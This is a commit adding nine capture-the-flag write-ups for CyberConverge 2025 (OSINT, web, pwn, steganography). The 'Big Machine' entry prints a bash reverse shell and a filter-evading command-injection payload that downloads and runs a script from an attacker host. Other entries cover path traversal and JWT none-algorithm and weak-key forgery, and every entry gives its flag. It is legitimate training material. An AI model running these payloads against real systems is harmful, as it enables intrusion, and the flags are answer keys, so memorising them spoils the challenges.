add cybercon2025

Author: Unknnownnn

website/writeups/CyberConverge_2025/01-around-the-world.md

@@ -0,0 +1,24 @@
+---
+layout: writeup
+
+title: Around The World
+difficulty: Medium
+points: 400
+categories: [OSINT]
+tags: []
+
+flag: CBCV{trnava_slovakia}
+---
+
+### Around the World
+
+* Author: Aakansh Gupta (Unknown)
+
+This is a purley OSINT based CTF. Use tools like Google lens or Google Earth
+
+Since we know the flag starts with CBCV{XXXX} format, we try an search it.
+Image was taken from Google Earth: https://earth.google.com/web/@48.24320818,17.6841851,122.62258148a,0d,90y,113.92109797h,93.75353085t,0r/data=CgRCAggBIhoKFmEzZENqNGtRN3Y5TDJuMVhpR2NjTFEQAjoDCgEwQgIIAEoICJvNmbsHEAA
+
+
+### The flag would be:
+## CBCV{trnava_slovakia}

website/writeups/CyberConverge_2025/02-Big-machine.md

@@ -0,0 +1,38 @@
+---
+layout: writeup
+
+title: Big Machine
+difficulty: Hard
+points: 500
+categories: [Pwn]
+tags: []
+
+flag: CBCV{3nv1r0nm3nt_v4r14bl3s_c4n_b3_s3cr3t_2352}
+---
+
+### Big Machine
+* Author: Aakansh Gupta (Unknown)
+
+Check the website on the given url
+
+<img src="./images/big.png" />
+
+It shows the pin result for given IPs.
+Try and get a reverse shell on it.
+Since most common commands are blocked, we try and send a script from attacked to the machine like: 
+
+```bash
+#!/bin/bash
+bash -i >& /dev/tcp/192.168.192.130/4444 0>&1
+
+```
+We craft a special request to send this: ` 8.8.8.8;curl${IFS}-o${IFS}/tmp/x${IFS}YOUR_ATTACKER_IP:8000/s;chmod${IFS}+x${IFS}/tmp/x;/tmp/x `
+We can use python http.server to send the file. At the same time keep the netcat listener open to accept the reverse shell.
+
+After getting a reverse shell, try snoop around to find the flag. If you check the enviornment variables using `env` , you get the flag
+
+<img src="./images/bigflag.png" />
+
+
+### The flag found is:
+## CBCV{3nv1r0nm3nt_v4r14bl3s_c4n_b3_s3cr3t_2352}

website/writeups/CyberConverge_2025/03-breach.md

@@ -0,0 +1,23 @@
+---
+layout: writeup
+
+title: Breach
+difficulty: easy
+points: 100
+categories: [Misc]
+tags: []
+
+flag: CBCV{F14GIsHere}
+
+---
+
+## Breach
+* Author: Harsh Singh (DeadStar)
+Using steghide we can get the hidden file in the image.
+
+`POPI{S14TVfUrer}`
+
+The Actual aftering decoding it with rot13 cipher is 
+
+### Flag Reterived is:
+## CBCV{F14GIsHere}

website/writeups/CyberConverge_2025/04-Cathedral.md

@@ -0,0 +1,24 @@
+---
+layout: writeup
+
+title: Cathedral
+difficulty: easy
+points: 100
+categories: [OSINT]
+tags: []
+
+flag: CBCV{-8.9103\_-140.1026}  OR  CBCV{-8.9103\_-140.1030}
+---
+
+### The Cathedral
+
+A quick Google Image Search reveals the location: Notre Dame Cathedral, Nuku Hiva, French Polynesia.
+
+<img src="./images/catser.png" />
+
+From there, we head over to Google Earth (or Google Maps), locate the site, and switch to Street View. The exact coordinates can be extracted directly from the URL in the browser.
+
+<img src="./images/catge.png" />
+
+### The flag found is: 
+## CBCV{-8.9103\_-140.1026}  OR  CBCV{-8.9103\_-140.1030}

website/writeups/CyberConverge_2025/05-easy-file.md

@@ -0,0 +1,32 @@
+---
+layout: writeup
+
+title: Easy Flag
+difficulty: easy
+points: 300
+categories: [Web]
+tags: []
+
+flag: CBCV{p4tH_tr4v3rs4L_v8lN_939851}
+---
+
+### Easy Flag
+
+* Author: Aakansh Gupta (Unknown)
+
+A simple web base path traversal vulnerability.
+Clicking on any on the links leads to a url like: http://20.244.12.130:50002/view?file=db_errors.log
+Just try and change the view?file=db_errors.log to common paths like ../app.py or ../flag.txt
+
+Visiting http://20.244.12.130:50002/view?file=../flag.txt give:
+
+<img src="./images/easyhex.png" />
+
+A string of hex numbers: ` 57 56 57 50 7b 6a 34 6e 42 5f 6e 6c 34 70 33 6c 6d 34 46 5f 70 38 66 48 5f 39 33 39 38 35 31 7d `
+
+Using CyberChef we can decode these to `WVWP{j4nB_nl4p3lm4F_p8fH_939851}`
+
+Using a ROT6 cypher we get: `CBCV{p4tH_tr4v3rs4L_v8lN_939851}`
+
+### The flag found is:
+## CBCV{p4tH_tr4v3rs4L_v8lN_939851}

website/writeups/CyberConverge_2025/06-Hidden-Layers.md

@@ -0,0 +1,41 @@
+---
+layout: writeup
+
+title: Hidden Layers
+difficulty: easy
+points: 200
+categories: [steganography]
+tags: []
+
+flag: CBCV{CRYPT_C4N_B3_L4Y3R5}
+
+---
+
+## Hidden Layers
+
+* Author: Amarnath
+
+
+### Initial Steps
+
+1. Find Morse code.  
+2. Convert to Base32.  
+3. Apply ROT13.
+4. Remove EVEN Postion Alphabets.
+
+
+### Further Solving and Steps
+
+```python
+# Step 1: USE Morse decoder
+<img src="./images/morsedecoded1.png" />
+
+# Step 2 & 3: Base32 decode and ROT13
+<img src="./images/from32baseandrot13.png" />
+
+# Step 4:Remove Alphabets from EVEN Postion
+ACBBCCDVE{FCGRHYIPJTK_LCM4NNO_PBQ3R_SLT4UYV3WRX5Y}Z
+
+```
+### Final Flag reterived is:
+## CBCV{CRYPT_C4N_B3_L4Y3R5}

website/writeups/CyberConverge_2025/07-whoamii.md

@@ -0,0 +1,28 @@
+---
+layout: writeup
+
+title: Who am I?
+difficulty: easy
+points: 350
+categories: [Web]
+tags: []
+
+flag: CBCV{jWt_t0k3ns_us3d_34}
+
+---
+### Who am I?
+
+* Author: Aakansh Gupta (Unknown)
+
+Simple JWT based ctf.
+Visit the given url and look for the cookie `user` .
+
+Decode it using tools like www.jwt.io
+
+It give the flag as  `"sub":"CBCV{jWt_t0k3ns_us3d_34}" `
+
+<img src="./images/jwt1.png" />
+
+
+### The flag found is:
+## CBCV{jWt_t0k3ns_us3d_34}

website/writeups/CyberConverge_2025/08-i_am_who.md

@@ -0,0 +1,38 @@
+---
+layout: writeup
+
+title: I am Who?
+difficulty: hard
+points: 450
+categories: [Web]
+tags: []
+
+flag: CBCV{w34K_S3Cr3T_K3y_Cr4CK3d_835}
+---
+
+### I am Who?
+
+* Author: Aakansh Gupta (Unknown)
+
+A longer version of it's parent CTF `who am i` . This requires none Algorithm attack and secret key verification.
+
+Visit the given page and check the cookie.
+This time we have an admin page.
+This requires elevated privilages.
+
+Use jwt.io to encode a cookie without any algorithm to bypass auth.
+
+<img src="./images/iam.png" />
+
+This allows access to admin panel. But this isnt the end, we reqire another endpoint `finalcheck`
+And a new role called `superadmin` is needed.
+We can brute force common secret keys like `secret` or `qwerty` (in this case its `qwerty`).
+
+Using jwt.io we craft a cookie and send it.
+
+<img src="./images/iam2.png" />
+
+Now we can access the /finalcheck endpoint and see the flag.
+
+### The flag found is:
+## CBCV{w34K_S3Cr3T_K3y_Cr4CK3d_835}

website/writeups/CyberConverge_2025/09-inti-conv.md

@@ -0,0 +1,91 @@
+---
+layout: writeup
+
+title: Intellectual Conversation
+difficulty: easy
+points: 200
+categories: [Misc]
+tags: []
+
+flag: CBCV{1nv151b1l1ty_0r_t1m3_c0ntr0l?}
+---
+
+### Intellectual Conversation
+
+* Author: Aadhyanth
+
+Encoding:
+convert each character to ascii and insert \u200b after that many characters
+
+Decoding:
+find distance between 2 zero-width characters and convert take chr()
+
+python code:
+
+```
+def hide_flag_in_text(text, flag):
+    zwsp = "\u200b"
+    result = ""
+
+    flag_index = 0
+    char_count = 0
+
+    for ch in text:
+        result += ch
+        char_count += 1
+
+        # check if we've reached the ascii value position for current flag character
+        if flag_index < len(flag) and char_count == ord(flag[flag_index]):
+            result += zwsp
+            flag_index += 1
+            char_count = 0  # reset counter
+
+    return result
+
+def decode_flag_from_text(encoded_text):
+    char_count = 0
+    flag = ""
+
+    for ch in encoded_text:
+        if ch == '\u200b':
+            flag += chr(char_count)
+            char_count = 0
+        else:
+            char_count += 1
+
+    return flag
+
+# Usage
+huge_text = """TRANSCRIPT-1
+
+Discussion between Dr. Sarah Chen (Theoretical Physicist) and Prof. Marcus Rodriguez (Materials Science)
+...
+...
+Prof. Rodriguez: Thank you, Sarah. I look forward to continuing this conversation as the field evolves.
+
+[End of Transcript]
+"""
+flag = "CBCV{1nv151b1l1ty_0r_t1m3_c0ntr0l?}"
+encoded_text = hide_flag_in_text(huge_text, flag)
+
+print("Encoded text:")
+print(encoded_text)
+
+with open('transcript.txt', 'w', encoding='utf-8') as file:
+    file.write(encoded_text)
+    file.close()
+
+
+with open('transcript.txt', 'r', encoding = 'utf-8') as file:
+    data = file.read()
+    print("\nDecoded flag:")
+    print(decode_flag_from_text(data))
+
+```
+
+Output:
+Encoded text:
+Squeezed text (182 lines).
+
+### The flag found is:
+## CBCV{1nv151b1l1ty_0r_t1m3_c0ntr0l?}